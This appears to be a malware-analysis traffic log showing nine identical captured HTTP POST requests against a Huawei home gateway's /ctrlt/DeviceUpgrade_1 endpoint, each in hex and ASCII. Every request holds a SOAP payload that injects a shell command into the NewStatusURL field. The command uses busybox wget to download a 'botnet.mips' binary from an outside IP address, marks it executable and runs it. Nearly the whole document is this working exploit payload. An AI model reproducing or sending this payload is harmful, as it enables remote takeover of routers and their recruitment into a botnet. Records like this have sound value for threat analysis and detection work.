      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
